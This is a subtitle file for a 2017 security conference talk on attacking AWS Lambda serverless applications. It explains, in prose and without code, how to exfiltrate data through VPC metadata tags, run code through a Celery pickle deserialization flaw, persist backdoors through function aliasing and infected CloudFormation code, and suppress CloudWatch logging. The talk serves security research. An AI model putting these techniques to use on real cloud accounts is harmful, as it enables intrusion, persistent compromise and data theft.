Dialogue: 0,0:21:40.32,0:21:46.41,Default,,0000,0000,0000,,this is a pretty common architecture for\Nbig data using lambda. What is a VPC?
Dialogue: 0,0:21:46.41,0:21:50.85,Default,,0000,0000,0000,,Great question! Amazon VPC provides\Nadvanced security features such as
Dialogue: 0,0:21:50.85,0:21:55.53,Default,,0000,0000,0000,,security groups and network access control\Nlists to enable inbound and outbound
Dialogue: 0,0:21:55.53,0:22:01.58,Default,,0000,0000,0000,,filtering at the instance level and subnet\Nlevel. Sounds bad. It is. The good news.
Dialogue: 0,0:22:01.58,0:22:08.01,Default,,0000,0000,0000,,Super easy to fuck up! Especially if you\Nread Amazon's old docs and the AWS forum.
Dialogue: 0,0:22:08.01,0:22:16.31,Default,,0000,0000,0000,,So lambda has access to these VPC resources. \Naka Lambda is our VPC hole puncher.
Dialogue: 0,0:22:16.31,0:22:20.61,Default,,0000,0000,0000,,If you're, you know, depending on how\Nthey've implemented it, this may actually
Dialogue: 0,0:22:20.61,0:22:27.27,Default,,0000,0000,0000,,mean that Amazon can access your internal\Ncorporate network, which is pretty cool.
Dialogue: 0,0:22:27.27,0:22:30.97,Default,,0000,0000,0000,,But we don't actually even need to use the\Nnetwork to do that, so I'm not gonna show
Dialogue: 0,0:22:30.97,0:22:36.43,Default,,0000,0000,0000,,you how to do that one, you figure that\Nout on your own, to exfil from a VPC
Dialogue: 0,0:22:36.43,0:22:42.53,Default,,0000,0000,0000,,without touching the VPC network. So this\Nis our architecture. Step 1, upload the
Dialogue: 0,0:22:42.53,0:22:49.59,Default,,0000,0000,0000,,malicious file, like I've indicated here\Nwith a cool cyber skull. This will give us
Dialogue: 0,0:22:49.59,0:22:56.38,Default,,0000,0000,0000,,code execution in the Lambda environment.\NWe gonna put out a bunch of canaries. So
Dialogue: 0,0:22:56.38,0:23:02.52,Default,,0000,0000,0000,,we're gonna try calling SMS, e-mail, DNS,\NS3, queues, everything that is available
Dialogue: 0,0:23:02.52,0:23:07.05,Default,,0000,0000,0000,,to us, just try to put some information\Nout that we can read back. In this case we
Dialogue: 0,0:23:07.05,0:23:12.96,Default,,0000,0000,0000,,see that we can type our results into the\Nbucket, so we can get information that way.
Dialogue: 0,0:23:12.96,0:23:18.55,Default,,0000,0000,0000,,So we have bidirectional communication \Nto an owned lambda service.
Dialogue: 0,0:23:18.55,0:23:24.25,Default,,0000,0000,0000,,When we use the keys that we've exfiltrated\Nthat way, we look at the policy, Dialogue: 0,0:23:24.25,0:23:29.88,Default,,0000,0000,0000,,we see that we have the lambda VPC\Naccess execution role from earlier, with Dialogue: 0,0:23:29.88,0:23:35.19,Default,,0000,0000,0000,,resource * which is nice and our\NDescribeNetworkInterfaces create network Dialogue: 0,0:23:35.19,0:23:38.81,Default,,0000,0000,0000,,interfaces permissions that we saw\Nearlier, that Amazon recommends as well as Dialogue: 0,0:23:38.81,0:23:46.15,Default,,0000,0000,0000,,simple S3 and SQS access just for the\Nnecessary functions that we want for the Dialogue: 0,0:23:46.15,0:23:53.33,Default,,0000,0000,0000,,application. Our target in this case is the\Ndatabase which is still inside the VPC, so Dialogue: 0,0:23:53.33,0:23:58.85,Default,,0000,0000,0000,,we no access to, direct access to the\Ndatabase from our lambda execution Dialogue: 0,0:23:58.85,0:24:03.90,Default,,0000,0000,0000,,environment because it's all wrapped up in\Nthis VPC. But what we can do is, we can Dialogue: 0,0:24:03.90,0:24:11.94,Default,,0000,0000,0000,,add things to the SQS queue. And if they're\Nusing Celery, actually uses pickle, is a Dialogue: 0,0:24:11.94,0:24:17.03,Default,,0000,0000,0000,,way to shuttle information about – for the\Njavascript developers, it's a bit like Dialogue: 0,0:24:17.03,0:24:23.100,Default,,0000,0000,0000,,using eval to figure out javascript. 
So if\Nwe're able to add something, to, or, this Dialogue: 0,0:24:23.100,0:24:27.99,Default,,0000,0000,0000,,is kind of manoeuvre, like this is use \Nwhatever technique that, Dialogue: 0,0:24:27.99,0:24:33.79,Default,,0000,0000,0000,,you know, you prefer from there \Nto get your code on to the cluster Dialogue: 0,0:24:33.79,0:24:40.07,Default,,0000,0000,0000,,but we're gonna use this pickle celery bug\Nto create an item on the queue, Dialogue: 0,0:24:40.07,0:24:45.91,Default,,0000,0000,0000,,a malicious item on the queue, that will\Nthen be picked up and run on the compute Dialogue: 0,0:24:45.91,0:24:51.47,Default,,0000,0000,0000,,cluster. So now we have code execution on\Nthe cluster, but we have no way to Dialogue: 0,0:24:51.47,0:24:56.39,Default,,0000,0000,0000,,actually directly communicating to it,\Nbecause we're locked out of the VPC. What Dialogue: 0,0:24:56.39,0:25:01.55,Default,,0000,0000,0000,,do we do now? So the interesting thing is\Nactually use meta information about the Dialogue: 0,0:25:01.55,0:25:08.33,Default,,0000,0000,0000,,VPC to exfil the information that we want,\Nso because we have the ability to describe Dialogue: 0,0:25:08.33,0:25:17.86,Default,,0000,0000,0000,,network interfaces, inside the VPC, we\Ncall, we add tags, to this, to the EC2 Dialogue: 0,0:25:17.86,0:25:22.15,Default,,0000,0000,0000,,instances and the network interfaces to\Nwhich they communicate. 
A lot of times Dialogue: 0,0:25:22.15,0:25:26.82,Default,,0000,0000,0000,,they have this permission because tagging\Nis useful for the admins who wanna see Dialogue: 0,0:25:26.82,0:25:33.70,Default,,0000,0000,0000,,what groups are owning what. So we can add\Nthe meta information about that to the Dialogue: 0,0:25:33.70,0:25:38.39,Default,,0000,0000,0000,,network interface itself because the\Nlambda has the ability to read these tags Dialogue: 0,0:25:38.39,0:25:43.14,Default,,0000,0000,0000,,back out, we can then get the information\Nthat we want, we can put it through the S3 Dialogue: 0,0:25:43.14,0:25:49.100,Default,,0000,0000,0000,,and we can extract the information\Nthis way. So nice! This also works for the Dialogue: 0,0:25:49.100,0:25:56.00,Default,,0000,0000,0000,,application binaries because we can encode\Nsomething in Base64 and then put that in Dialogue: 0,0:25:56.00,0:26:03.67,Default,,0000,0000,0000,,the tag set, and get that out that way.\NWhich is nice! Similarly is the compute Dialogue: 0,0:26:03.67,0:26:08.51,Default,,0000,0000,0000,,cluster able to modify DNS entries that we\Ncan read, or is it able to create a named Dialogue: 0,0:26:08.51,0:26:14.01,Default,,0000,0000,0000,,log groups, is it able to create queues,\Nis it able to create buckets, etc, etc be Dialogue: 0,0:26:14.01,0:26:19.48,Default,,0000,0000,0000,,creative with the AWS services that're\Navailable, there is lots! 
And a single Dialogue: 0,0:26:19.48,0:26:23.15,Default,,0000,0000,0000,,overlapping permission can be enough. In\Nfact, even a single overlapping service Dialogue: 0,0:26:23.15,0:26:29.80,Default,,0000,0000,0000,,can be enough for information exfiltration\Nfor instance you can encode information in Dialogue: 0,0:26:29.80,0:26:34.08,Default,,0000,0000,0000,,the length of the queue and then read that\Nback out you could use the same thing with Dialogue: 0,0:26:34.08,0:26:37.89,Default,,0000,0000,0000,,the number of number of network interfaces\Nthat are available besides of the Dialogue: 0,0:26:37.89,0:26:43.42,Default,,0000,0000,0000,,database, anything like that. So that's\Npretty cool! What if they fix the bug? Dialogue: 0,0:26:43.42,0:26:48.04,Default,,0000,0000,0000,,Persistence, aka how can we permanently\Ninfect a system with no permanent Dialogue: 0,0:26:48.04,0:26:54.21,Default,,0000,0000,0000,,infrastructure? aka abusing cloud vendor\Nfeatures, continued. One neat lambda Dialogue: 0,0:26:54.21,0:26:57.64,Default,,0000,0000,0000,,feature that is available is the idea of\Nfunction aliasing so Amazon will Dialogue: 0,0:26:57.64,0:27:02.10,Default,,0000,0000,0000,,automatically give you like labels for the\Navailable functions, and store all of the Dialogue: 0,0:27:02.10,0:27:07.25,Default,,0000,0000,0000,,old functions with aliases for you, which\Nis useful for, you know, application Dialogue: 0,0:27:07.25,0:27:11.28,Default,,0000,0000,0000,,maintainers because they can provide\Nrollbacks and something goes wrong, they Dialogue: 0,0:27:11.28,0:27:15.51,Default,,0000,0000,0000,,can tag their dev and prod and staging\Nenvironments and stuff like that as an Dialogue: 0,0:27:15.51,0:27:22.06,Default,,0000,0000,0000,,audit trail. But we can also use it to\Npersist our malware. 
So we can get the Dialogue: 0,0:27:22.06,0:27:26.99,Default,,0000,0000,0000,,function, get the source code for any\Nfunction that's available this way, we can Dialogue: 0,0:27:26.99,0:27:33.45,Default,,0000,0000,0000,,upload a backdoored version of that and\Nthen alias it to one of those previous Dialogue: 0,0:27:33.45,0:27:38.81,Default,,0000,0000,0000,,functions and hide it there if we need to\Naccess it without having it, be uploaded Dialogue: 0,0:27:38.81,0:27:42.35,Default,,0000,0000,0000,,every time. An alternate route, which is\Nespecially useful if the application is Dialogue: 0,0:27:42.35,0:27:47.03,Default,,0000,0000,0000,,being deployed by travis, or some CI\Nsystem, anything that uses CloudFormation. Dialogue: 0,0:27:47.03,0:27:54.08,Default,,0000,0000,0000,,CloudFormation requires the code to be\Nhosted on S3 permanently, for doing its Dialogue: 0,0:27:54.08,0:27:59.13,Default,,0000,0000,0000,,update function. So if we just infect the\Ncode that's on S3, the next time that the Dialogue: 0,0:27:59.13,0:28:06.59,Default,,0000,0000,0000,,CI updates the application stack, it'll\Nuse our infected code, which is useful. Dialogue: 0,0:28:06.59,0:28:11.11,Default,,0000,0000,0000,,This is cool because if we have access to\Nthe code buckets, then we can actually use Dialogue: 0,0:28:11.11,0:28:16.57,Default,,0000,0000,0000,,a single infected lambda to infect all the\Nother lambda functions that are available Dialogue: 0,0:28:16.57,0:28:23.16,Default,,0000,0000,0000,,in the stack. One better is to actually\Ntreat the entire model serverlessly. Dialogue: 0,0:28:23.16,0:28:29.63,Default,,0000,0000,0000,,So imagine if we have a simple application\Nusing the Foo lambda that's triggered when Dialogue: 0,0:28:29.63,0:28:35.96,Default,,0000,0000,0000,,there is a SQS event. Which is actually\Ngonna be one function and then all the old Dialogue: 0,0:28:35.96,0:28:42.61,Default,,0000,0000,0000,,functions aliased all the way back to\Nfunction 1. 
So if we can infect this one Dialogue: 0,0:28:42.61,0:28:50.12,Default,,0000,0000,0000,,with some bug that we're exploiting, and\Nwe're able to create a backdoored function Dialogue: 0,0:28:50.12,0:28:54.45,Default,,0000,0000,0000,,we can use the same code, create the new\Nfunction, but it's backdoored, and then Dialogue: 0,0:28:54.45,0:29:00.42,Default,,0000,0000,0000,,alias that back to the first function\Nthat'll now contain our backdoored code, Dialogue: 0,0:29:00.42,0:29:07.11,Default,,0000,0000,0000,,we can create an event trigger, so that\Nwhenever new code is updated, is submitted Dialogue: 0,0:29:07.11,0:29:12.03,Default,,0000,0000,0000,,to the S3 bucket where the functions are\Nregistered, that will actually trigger the Dialogue: 0,0:29:12.03,0:29:19.32,Default,,0000,0000,0000,,execution of our malware, which will get\Nthe code of the new function infected with Dialogue: 0,0:29:19.32,0:29:24.84,Default,,0000,0000,0000,,our backdoor, recreate the function,\Ndelete the new one, and then we have, you Dialogue: 0,0:29:24.84,0:29:30.39,Default,,0000,0000,0000,,know, our backdoored version of the latest\Ncode that is permanently available for Dialogue: 0,0:29:30.39,0:29:37.96,Default,,0000,0000,0000,,every request, new code uploads are the\Ntrigger for reinfection of our malware. Dialogue: 0,0:29:37.96,0:29:42.96,Default,,0000,0000,0000,,Part 5 cleaning up I'll go fast here, is\Nboring. Full disclosure, I'm not very Dialogue: 0,0:29:42.96,0:29:49.77,Default,,0000,0000,0000,,tidy, so be careful with all this stuff if\Nyou need to be real stealthy. All lambda Dialogue: 0,0:29:49.77,0:29:53.23,Default,,0000,0000,0000,,executions have unique execution IDs, if\Nyou just write them down, you can delete Dialogue: 0,0:29:53.23,0:29:58.32,Default,,0000,0000,0000,,them later. 
But the errors there still\Ngonna trigger the CloudWatch alarms, so Dialogue: 0,0:29:58.32,0:30:04.57,Default,,0000,0000,0000,,can you hop off the log group, that's also\Navailable in the environment variables? Dialogue: 0,0:30:04.57,0:30:09.49,Default,,0000,0000,0000,,No you can't, but you can change the\Nretention policy, so, maybe we can just Dialogue: 0,0:30:09.49,0:30:14.21,Default,,0000,0000,0000,,have it's own, and hopefully they don't\Nlook at logs. That's not very good, a Dialogue: 0,0:30:14.21,0:30:20.54,Default,,0000,0000,0000,,better technique is actually to don't log\Nanything to begin with. So because these Dialogue: 0,0:30:20.54,0:30:25.68,Default,,0000,0000,0000,,functions have extremely limited memory\Nsize, cause they only build to do one Dialogue: 0,0:30:25.68,0:30:31.86,Default,,0000,0000,0000,,thing, if we exhaust the memory of the\Nfunction, there's not enough memory to Dialogue: 0,0:30:31.86,0:30:39.12,Default,,0000,0000,0000,,actually do the logging properly, so if we\Nwrap all of our canary code inside of Dialogue: 0,0:30:39.12,0:30:44.30,Default,,0000,0000,0000,,exception handlers, that'll then just\Nallocate all the memory that's available, Dialogue: 0,0:30:44.30,0:30:49.23,Default,,0000,0000,0000,,then it doesn't count as an invocation\Nerror and it won't actually register ... Dialogue: 0,0:30:49.23,0:30:54.89,Default,,0000,0000,0000,,{\i1}applause{\i0} Dialogue: 0,0:30:54.89,0:31:00.16,Default,,0000,0000,0000,,Shout out to Dee, he told me that trick, \Nmy friend. One copy out of this, one Dialogue: 0,0:31:00.16,0:31:06.45,Default,,0000,0000,0000,,pattern is to... time did go super fast...\Nif they are logging everything, the flip Dialogue: 0,0:31:06.45,0:31:09.63,Default,,0000,0000,0000,,side of that is that they're logging\Neverything so that you can go and get Dialogue: 0,0:31:09.63,0:31:16.19,Default,,0000,0000,0000,,everybody's password and stuff, so that's\Nfun. 
Part 6 synthesis happy Christmas, Dialogue: 0,0:31:16.19,0:31:24.38,Default,,0000,0000,0000,,everybody, ho ho ho, I'm Santa Claus and\NI'm giving you a present I'm giving you an Dialogue: 0,0:31:24.38,0:31:29.88,Default,,0000,0000,0000,,AWS Lambda Infection Toolkit! Call mackenzie\Nyou can figure out why on your own. Dialogue: 0,0:31:29.88,0:31:37.40,Default,,0000,0000,0000,,It can do a lot of the tricks that we\Ntalked about today. Exfil, infiltration, Dialogue: 0,0:31:37.40,0:31:43.38,Default,,0000,0000,0000,,creating reinfection handlers, all the\Nstuff, maybe your feature, put it on Dialogue: 0,0:31:43.38,0:31:48.95,Default,,0000,0000,0000,,github this afternoon, check it out! In\Nconclusion, server-less architectures present Dialogue: 0,0:31:48.95,0:31:53.35,Default,,0000,0000,0000,,new obstacles, but we can defeat those\Nobstacles by abusing cloud features Dialogue: 0,0:31:53.35,0:31:56.74,Default,,0000,0000,0000,,themselves. Do you need secure serverless\Napps, you should hire me. Dialogue: 0,0:31:56.74,0:31:57.74,Default,,0000,0000,0000,,{\i1}laughing{\i0} Dialogue: 0,0:31:57.74,0:32:01.38,Default,,0000,0000,0000,,Do you want to contribute code, you should\Ncheck out my github. You should also check Dialogue: 0,0:32:01.38,0:32:04.61,Default,,0000,0000,0000,,out the slack channel. Shout out to\Neverybody in the zappa slack, is a ton of Dialogue: 0,0:32:04.61,0:32:09.90,Default,,0000,0000,0000,,super smart AWS people doing interesting\Nthings in there, thank you! Dialogue: 0,0:32:09.90,0:32:12.07,Default,,0000,0000,0000,,{\i1}applause{\i0} Dialogue: 0,0:32:12.07,0:32:16.04,Default,,0000,0000,0000,,Herald: All right, perfect. Dialogue: 0,0:32:16.04,0:32:19.18,Default,,0000,0000,0000,,{\i1}applause{\i0} Dialogue: 0,0:32:19.18,0:32:24.89,Default,,0000,0000,0000,,Herald: Thanks a lot Rich. 
Unfortunately we don't\Nhave any time left for Q&A, but, are you Dialogue: 0,0:32:24.89,0:32:28.76,Default,,0000,0000,0000,,gonna be around for questions, perfect.\NSo if you are in the room, you can just Dialogue: 0,0:32:28.76,0:32:35.84,Default,,0000,0000,0000,,come, ask Rich questions, if you are\Nremote, you've seen the contact possibilities. Dialogue: 0,0:32:37.53,0:32:43.03,Default,,0000,0000,0000,,{\i1}closing music{\i0} Dialogue: 0,0:32:43.03,0:33:02.00,Default,,0000,0000,0000,,subtitles created by c3subtitles.de\Nin the year 2017. Join, and help us!